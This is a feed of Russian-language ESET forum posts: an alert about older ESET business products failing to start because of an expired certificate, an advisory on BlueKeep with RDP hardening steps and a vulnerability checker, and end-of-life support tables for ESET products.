07.06.2020 23:50:53, Erbol Akhtaylyakov.]]> http://forum.esetnod32.ru/messages/forum9/topic15920/message109183/ http://forum.esetnod32.ru/messages/forum9/topic15920/message109183/ Sun, 07 Jun 2020 23:50:53 +0300 Полезная информация ESET: Проблема запуска устаревших продуктов ESET: Проблема запуска устаревших продуктов в форуме Полезная информация.
Детали оповещения

Мы хотели бы сообщить вам, что мы обнаружили проблему в более старых версиях продуктов наших бизнес-продуктов Windows, в частности ESET Endpoint Antivirus / ESET Endpoint Security v5 (старше 5.0.2271), ESET Endpoint Antivirus / ESET Endpoint Security / ESET Защита файлов для Windows 6.5.2000+, ESET Mail Security для Microsoft Exchange Server 6.5, ESET Security для Kerio 6.5, ESET Mail Security для Domino 6.5 и ESET Security для Sharepoint Server 6.5.

Эта проблема НЕ касается последних версий наших продуктов, включая последние версии ESET Endpoint Antivirus / ESET Endpoint Security - 6.6.2089 и ESET File Security для Windows 7.1.12018, и клиенты, использующие последние версии, никак не затрагиваются. Эта проблема относится к уязвимым версиям, перечисленным и описанным ниже.

ESET обнаружила, что в нашем ядре есть проблема с проверкой отметки времени уже истекшего сертификата (срок действия которого истек 7 февраля 2020 г.). Этот метод дает сбой, и наши модули в более старых, устаревших версиях объявляются как ненадежные и поэтому не загружаются. Этот механизм гарантирует, что ненадежная библиотека не загружается.

В результате уязвимые версии не загружают модули (брандмауэр, HIPS, обновление, защита устройства, защита через Интернет и электронную почту) и не работают, поэтому защита не работает.

Новейшие версии наших продуктов НЕ затрагиваются.

Симптомы:
Для версий старше 5.0.2271.x симптомы:
- Не удалось загрузить модули для семейства v5
- Графический интерфейс главного окна на английском языке и логотип показывает ESET Smart Security 5 вместо Endpoint Security

Для версий 6.5.x симптомы:
- Отчеты о продуктах антифишинга отключены
- Продукт сообщает, что он не активирован
- У расширенных настроек продукта отсутствуют функции

Если ими управляет наш ESET Remote Administrator или ESET Security Management Center, они обратятся к соответствующей параметрической группе и сообщат о предупреждении как не активированном, а модуль антифишинга - как неработающий.

В случаях, когда библиотеки загружены, SelfDefense защищает процесс EKRN и делает невозможным удаление.


Решение
Важно!

Если вы используете уязвимые версии и проблема не проявляется, не перезагружайте компьютер и немедленно выполните обновление.

На данный момент не существует автоматического решения, и ESET работает над подготовкой такого решения для большинства версий, когда это возможно.

Мы рекомендуем обновить конечные точки v5 до последней версии v5.0.2271.x, которая, по возможности, не затронута. В противном случае мы рекомендуем удалить v5 и установить ESET Endpoint Antivirus / ESET Endpoint Security 7.2.

Для семейства v6.5 мы настоятельно рекомендуем обновить до последней версии ESET Endpoint Antivirus / ESET Endpoint Security 7.2 или ESET File Security для Windows / ESET Mail Security для Microsoft Exchange Server / ESET Mail Security для Domino / ESET Security для Sharepoint Server 7.1 ,

Для ESET Security для Kerio 6.5 мы работаем над этим и исправим его как можно скорее.

Если вы используете Windows XP с EEA / EES 6.5.x, мы рекомендуем перейти на последнюю версию EEA / EES 5.0.2271.

Если эта проблема уже возникла на ваших компьютерах, и вы не можете удалить и / или обновить продукты ESET, обратитесь к местному клиенту ESET, который предоставит вам решение и проведет вас через весь процесс.


Пострадавшие сборки:

ESET Endpoint Antivirus и ESET Endpoint Security для Windows, версии от 5.0.2126.0 до 5.0.2260.x
Последняя доступная сборка ESET Endpoint Antivirus / ESET Endpoint Security 5.0.2271.0 не затрагивается.


ESET Endpoint Antivirus, ESET Endpoint Security и ESET File Security для Windows, версии 6.5.x
Последняя версия ESET Endpoint Antivirus / ESET Endpoint Security 6.6.2089.x и 7.2.2055.x не затронута, равно как и последняя версия 7.1.12018.x ESET File Security для Windows.

Если у вас есть какие-либо проблемы или вопросы - или вы не можете перейти на последние версии - не стесняйтесь обращаться в службу поддержки клиентов ESET в вашем регионе.

https://support.eset.com/en/alert7396-legacy-products-startup-issue
10.02.2020 17:00:54, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic15708/message108202/ http://forum.esetnod32.ru/messages/forum9/topic15708/message108202/ Mon, 10 Feb 2020 17:00:54 +0300 Полезная информация Пришло время отключить доступ к RDP из интернета Пришло время отключить доступ к RDP из интернета в форуме Полезная информация.
Хотя уязвимость BlueKeep (CVE-2019-0708) до настоящего времени не вызывала широкомасштабного хаоса, и мы рассмотрим причины, по которым в этом посте она все еще находится на очень ранней стадии жизненного цикла эксплуатации. Факт остается фактом, что многие системы все еще не исправлены, и все еще можно найти полностью исправленную версию эксплойта. Из-за этих факторов ESET создала бесплатную утилиту для проверки уязвимости системы.
https://download.eset.com/com/eset/tools/diagnosis/bluekeep_checker/latest/esetblu­ekeepchecker.exe

Существует множество серверов, работающих под управлением различных версий серверных операционных систем Microsoft Windows, которые напрямую подключены к Интернету, что практически не обеспечивает безопасности доступа к ним.

Что такое RDP?

RDP, сокращение от «Протокол удаленного рабочего стола», позволяет одному компьютеру подключаться к другому компьютеру по сети, чтобы использовать его удаленно. В домене компьютеры с операционной системой Windows Client, такой как Windows XP или Windows 10, поставляются с предустановленным клиентским программным обеспечением RDP как часть операционной системы, которая позволяет им подключаться к другим компьютерам в сети, включая сервер организации ( с).

Сегодня, обычно к пользователям RDP относятся системные администраторы, выполняющие удаленное администрирование серверов, а также удаленные работники, которые могут подключаться к виртуализированным настольным компьютерам внутри домена своей организации.

За последние несколько лет в ESET наблюдают рост числа случаев, когда злоумышленники подключались к Интернету с помощью RDP удаленно к Windows Server через Интернет и входили в систему как администратор компьютера. После того, как злоумышленники войдут на сервер как администратор. Далее, они выполняют различные действия:

 
====quote====
очистка лог-файлов, содержащих доказательства их присутствия в системе;
   отключение запланированных резервных копий и теневых копий;
   отключение защитного программного обеспечения или настройка исключений в нем (что разрешено администраторам);
   загрузка и установка различных программ на сервер;
   стирание или перезапись старых резервных копий, если они доступны;
   эксфильтрация данных с сервера;
   установка программ добычи монет для генерации криптовалюты, таких как Monero;
   установка Ransomware с целью вымогательства денег у организации, которые часто выплачиваются с использованием криптовалюты, такой как биткойны.
=============


Уязвимость BlueKeep позволяет злоумышленникам запускать произвольный программный код на компьютерах своих жертв. Поскольку они могут использовать автоматизированные инструменты для атак, эта атака может распространяться автоматически по сетям без какого-либо вмешательства пользователей, как Win32 / Diskcoder.C ( ака NotPetya) и Conficker в прошлом.

В начале сентября Rapid7, разработчик инструмента пентестинга Metasploit, объявил о выпуске эксплойта BlueKeep. Несмотря на то, что в течение следующих нескольких месяцев не было зарегистрировано заметного увеличения активности BlueKeep, в последнее время ситуация изменилась. В начале ноября, как отмечают ZDNet и WIRED, стали доступны массовые сообщения об эксплуатации BlueKeep. По сообщениям, атаки были менее чем успешными: около 91% уязвимых компьютеров вылетали с ошибкой остановки (так называемая проверка ошибок или синий экран смерти), когда злоумышленник пытается использовать уязвимость BlueKeep. Однако на оставшихся 9% уязвимых компьютеров эти злоумышленники успешно установили программное обеспечение для криптомайнинга Monero.

Защита от злоумышленников, атакующих RDP

Итак, учитывая все это, что вы можете сделать? Ну, во-первых, очевидно, чтобы прекратить подключение напрямую к вашим серверам через Интернет с помощью RDP. Поддержка Windows Server 2008 и Windows 7 заканчивается в январе 2020 года, наличие компьютеров под управлением этих компьютеров и их прямой доступ через RDP через Интернет представляет собой риск для вашего бизнеса, который вы уже должны планировать снизить.

Это не означает, что вам необходимо немедленно прекратить использование RDP, но вам необходимо предпринять дополнительные шаги, чтобы обезопасить его как можно скорее и как можно быстрее. С этой целью мы создали таблицу с десятью основными шагами, которые вы можете предпринять, чтобы начать защищать свои компьютеры от атак на основе RDP.


====quote====
   1. Запретить внешние подключения к локальным компьютерам через порт 3389 (TCP / UDP) на межсетевом экране периметра. * Блокирует доступ к RDP из Интернета.
   (* По умолчанию RDP работает на порте 3389. Если вы изменили этот порт на другое значение, то этот порт должен быть заблокирован.)

   2. Протестируйте и разверните исправления для уязвимости CVE-2019-0708 (BlueKeep) и включите аутентификацию на уровне сети (NLA) как можно быстрее. Установка исправления Microsoft и следование их предписывающим рекомендациям помогает обеспечить защиту устройств от уязвимости BlueKeep.

   3. Для всех учетных записей, в которые можно войти через RDP, требуются сложные пароли (обязательна длинная парольная фраза, содержащая более 15 символов). Защищает от взлома паролей и взлома учетных данных.

   4. Установите двухфакторную аутентификацию (2FA) и, как минимум, требуйте ее для всех учетных записей, в которые можно войти через RDP. Требуется второй уровень аутентификации, доступный сотрудникам только через мобильный телефон, токен или другой механизм для входа в компьютеры.

   5. Установите шлюз виртуальной частной сети (VPN), чтобы обеспечить безопасность во всех RDP-подключениях вне локальной сети. Предотвращает RDP-соединения между интернетом и вашей локальной сетью.

   6. Защитите программное обеспечение для защиты конечных точек паролем, используя надежный пароль, не связанный с учетными записями администраторов и служб.

   7. Включите блокировку эксплойтов в программном обеспечении безопасности конечных точек. Убедитесь, что эта функция включена.

   8. Изолируйте любой небезопасный компьютер, к которому требуется доступ из Интернета, используя RDP.

   9. Заменить небезопасные компьютеры. Если компьютер не может быть исправлен с помощью уязвимости BlueKeep, запланируйте его своевременную замену.

   10. Рассмотрите возможность блокировки geoIP на шлюзе VPN. Если сотрудники и поставщики находятся в одной и той же стране или в небольшом списке стран, рассмотрите возможность блокировки доступа из других стран, чтобы предотвратить соединения со стороны иностранных злоумышленников.
=============


Использование средства проверки уязвимости ESET BlueKeep (CVE-2019-0708)

ESET выпустила бесплатный инструмент BlueKeep (CVE-2019-0708), чтобы проверить, уязвим ли компьютер под управлением Windows. На момент публикации инструмент можно загрузить с:

   Program ESET BlueKeep (CVE-2019-0708) vulnerability checker
   Version 1.0.0.1
   Location https://download.eset.com/com/eset/tools/diagnosis/bluekeep_checker/latest/esetblu­ekeepchecker.exe
   SHA-1 hash C0E66EA2659D2EA172950572FDB5DE881D3882D8


При запуске программа сообщит, уязвима ли система для эксплуатации BlueKeep или нет. В случае уязвимости системы инструмент переместит пользователя на веб-страницу, чтобы загрузить соответствующий патч на веб-сайте Microsoft.

Пользователь добавил изображение

подробнее здесь:

https://www.welivesecurity.com/2019/12/17/bluekeep-time-disconnect-rdp-internet/
27.12.2019 08:10:10, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic15582/message107882/ http://forum.esetnod32.ru/messages/forum9/topic15582/message107882/ Fri, 27 Dec 2019 08:10:10 +0300 Полезная информация ESET End of Life политика для коммерческих и домашних продуктов ESET End of Life политика для коммерческих и домашних продуктов в форуме Полезная информация.
для коммерческих продуктов:

ESET Endpoint Antivirus
Version Release Date Latest build Updated Status Next Status Expected EOL
7.0 16-Aug-18 7.1.2045.5 11-Apr-19 Full Support Limited Support TBA
6.6 24-Aug-17 6.6.2089.2 13-Nov-18 Full Support Limited Support TBA
6.5 14-Mar-17 6.5.2123.5 28-Nov-17 Full Support Limited Support TBA

ESET Endpoint Security
Version Release Date Latest build Updated Status Next Status Expected EOL
7.0 16-Aug-18 7.1.2045.5 11-Apr-19 Full Support Limited Support TBA
6.6 25-Feb-15 6.6.2089.2 13-Nov-18 Full Support Limited Support TBA
6.5 14-Mar-17 6.5.2123.5 28-Nov-17 Full Support Limited Support TBA

ESET File Security for Microsoft Windows Server
Version Release Date Latest build Updated Status Next Status Expected EOL
7.0 16-Aug-18 7.0.12018.0 29-Jan-19 Full Support Limited Support TBA
6.5 28-Feb-17 6.5.12018.0 28-Aug-18 Full Support Limited Support TBA
6.4 7-Sep-16 6.4.12004.0 30-Nov-16 Full Support Limited Support TBA

https://support.eset.com/kb3592/

для домашних продуктов:

ESET Smart Security Premium
Version Release Date Latest Build Updated Status Next Status Expected EOL
12 23-Oct-18 12.2.23.0 18-Jul-19 Full Support Limited Support Dec 2022
11 24-Oct-17 11.2.63.0 11-Sep-18 Limited Support Basic Support Dec 2021
10 25-Oct-16 10.1.245.0 17-May-18 Basic Support End of Life Dec 2020

ESET NOD32 Antivirus
Version Release Date Latest Build Updated Status Next Status Expected EOL
12 23-Oct-18 12.2.23.0 18-Jul-19 Full Support Limited Support Dec 2022
11 24-Oct-17 11.2.63.0 11-Sep-18 Limited Support Basic Support Dec 2021
10 25-Oct-16 10.1.245.0 17-May-18 Basic Support End of Life Dec 2020

https://support.eset.com/kb3678/?segment=home
13.08.2019 16:45:54, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic15416/message107086/ http://forum.esetnod32.ru/messages/forum9/topic15416/message107086/ Tue, 13 Aug 2019 16:45:54 +0300 Полезная информация